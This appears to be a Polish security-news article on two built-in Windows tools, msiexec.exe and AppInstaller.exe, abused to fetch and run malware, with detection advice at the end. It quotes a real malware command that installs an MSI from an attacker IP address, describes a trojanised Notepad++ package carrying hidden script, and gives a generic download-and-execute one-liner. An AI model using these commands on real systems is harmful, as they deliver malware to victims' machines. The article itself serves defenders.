Cybernews

Cyberekspert

Kampanie

Sklep

Menu dostępności

Nowe narzędzia systemowe służące do pobrania i uruchomienia malware używane przez cyberprzestępców

Kapitan Hack / Cybernews / Nowe narzędzia systemowe służące do pobrania i uruchomienia malware używane przez cyberprzestępców

W dzisiejszym artykule opiszemy i pokażemy kolejne narzędzie wbudowane w Windows (nazywane w cyberbezpieczeństwie LOLBIN) umożliwiające złośliwym aktorom pobranie z Internetu danych (treści) oraz wykonanie kodu.

Nie tak dawno opisywaliśmy narzędzie GfxDownloadWrapper.exe, które jest dostępne na komputerach z Windows z wgranymi sterownikami karty Intel.

Tym razem opiszemy kolejne dwa: popularne narzędzie do instalacji „msiexec.exe” oraz „Appinstaller.exe”.
Oba są wbudowane w Windows i złośliwi atakujący wykorzystują je do pobrania z Internetu ładunku i uruchomienia go. Ich zastosowanie odkrył badacz o pseudonimie „notwickey”.

Autor: 3 min czytania

Msiexec.exe i złośliwy skrypt

Msiexec to znane i wbudowane w system operacyjny Windows narzędzie służące do instalacji oprogramowania (w postaci pakietów MSI i MSP) i jest całkowicie bezpieczny dla komputera. W ostatnim czasie znalazło jednak nowe zastosowanie – do pobierania i wykonania złośliwego kodu. Poniżej prezentujemy przykładowy zobfuskowany skrypt „.bat” używany przez malware do pobrania i uruchomienia na komputerze złośliwego oprogramowania:

W skrypcie widać, w trzeciej linijce, wykonanie komendy „start” uruchamiającej polecenie:

– Msiexec /i http://188.127.224.100/up.msi

Plik „up.msi” zawiera w sobie wersję instalacyjną aplikacji Notepad++ oraz zobfuskowany złośliwy skrypt JavaScript z ładunkiem, który jest wypakowywany do katalogu użytkownika %TEMP%. Następnie w rozpakowanych plikach (wypakowanych przez instalatora) jest wyszukiwany specjalny ciąg znaków za pomocą polecenia „findstr” i na końcu wykonywany jest skrypt za pomocą wbudowanej w Windows komendy „wscript”.


AppInstaller.exe i uruchomienie malware

Kolejnym narzędziem jest AppInstaller.exe (Instalator aplikacji) umożliwiający instalowanie aplikacji systemu Windows 10 przez dwukrotne kliknięcie pakietu aplikacji. Oznacza to, że użytkownicy nie muszą używać programu PowerShell ani innych narzędzi programistycznych do wdrażania aplikacji systemu Windows 10. Instalator aplikacji może również zainstalować aplikację z Internetu, opcjonalne pakiety i powiązane zestawy. Instalator można pobrać do użytku w trybie offline z portalu internetowego Microsoft Store dla firm.

Poniżej przedstawiamy przykład, za pomocą którego możecie pobrać dowolny plik z Internetu i go wykonać. Należy wykonać następujące polecenie na Windows:

– start ms-appinstaller://?source=URL

,gdzie „URL” to adres, skąd ma zostać pobrany i wykonany plik. Przykład pobrania pliku i uruchomienia kalkulatora na Windows poniżej:


Rekomendacje

Od strony zabezpieczeń zalecamy dodanie dwóch komend („msiexec.exe” oraz „ms-appinstaller”) do monitorowanych procesów i poleceń w SYSMON lub narzędziu EDR, a także dodanie odpowiednich reguł monitorujących w systemach SIEM, celem wykrycia na komputerach ich wykonania. Warto też zwrócić uwagę na komendy „start.exe”, „findstr” oraz „forfiles”, które w obu przypadkach pełnią istotną rolę w całym procesie ataku.

Popularne

7-Zip podatny na NTFS Heap Overflow

7-Zip podatny na NTFS Heap Overflow

Jaroslav Lobačevski z GitHub Security Lab opublikował analizę nowej podatności odnalezionej w 7-Zip, oznaczonej jako GHSL-2026-140. Luka dotyczy parsera NTFS i prowadzi do uszkodzenia pamięci procesu, co w...
6 min czytania 28 maj 2026 07:52
Fałszywe ChatGPT i Claude infekują komputery. Cyberprzestępcy wykorzystują boom na AI

Fałszywe ChatGPT i Claude infekują komputery. Cyberprzestępcy wykorzystują boom na AI

Popularność sztucznej inteligencji rośnie w niespotykanym tempie. Narzędzia takie jak ChatGPT czy Claude stały się codziennym wsparciem dla programistów, analityków, studentów i firm. Miliony użytkown...
7 min czytania wczoraj
YellowKey: koniec mitu o bezpieczeństwie BitLockera? Nowy zero-day pozwala ominąć szyfrowanie przy użyciu zwykłego pendrive’a

YellowKey: koniec mitu o bezpieczeństwie BitLockera? Nowy zero-day pozwala ominąć szyfrowanie przy użyciu zwykłego pendrive’a

Jeszcze w piątek opisywaliśmy nowe podatności typu zero-day, o nazwach YellowKey oraz GreenPlasma, uderzające w mechanizmy bezpieczeństwa systemów Windows. Najnowsze informacje pokazują jednak, że spr...
8 min czytania 18 maj 2026 07:58
Repozytoria na GitHubie zainfekowane w ataku Megalodon!

Repozytoria na GitHubie zainfekowane w ataku Megalodon!

Ponad 5 500 repozytoriów na GitHubie zostało zainfekowanych złośliwym oprogramowaniem w ataku na łańcuch dostaw, wykorzystującym zautomatyzowane zatwierdzanie zmian. Kampania, nazwana „Megalodon”, opiera si...
4 min czytania 27 maj 2026 06:53
Jak zmienić nieznane/zapomniane hasło Administratora na Windows?

Jak zmienić nieznane/zapomniane hasło Administratora na Windows?

W tym artykule pokażemy, jak możemy zmienić hasło administratora na komputerze posiadając do niego fizyczny dostęp. Artykuł ten można potraktować także jako przestrogę dla firm, które nie zaimplementowały jeszcze odpo...
5 min czytania 5 cze 2019 08:00
Popularne
7-Zip podatny na NTFS Heap Overflow
Fałszywe ChatGPT i Claude infekują komputery. Cyberprzestępcy wykorzystują boom na AI
YellowKey: koniec mitu o bezpieczeństwie BitLockera? Nowy zero-day pozwala ominąć szyfrowanie przy użyciu zwykłego pendrive’a
Repozytoria na GitHubie zainfekowane w ataku Megalodon!
Jak zmienić nieznane/zapomniane hasło Administratora na Windows?
Appeal

Ta strona korzysta z ciasteczek aby świadczyć usługi na najwyższym poziomie. Dalsze korzystanie ze strony oznacza, że zgadzasz się na ich użycie.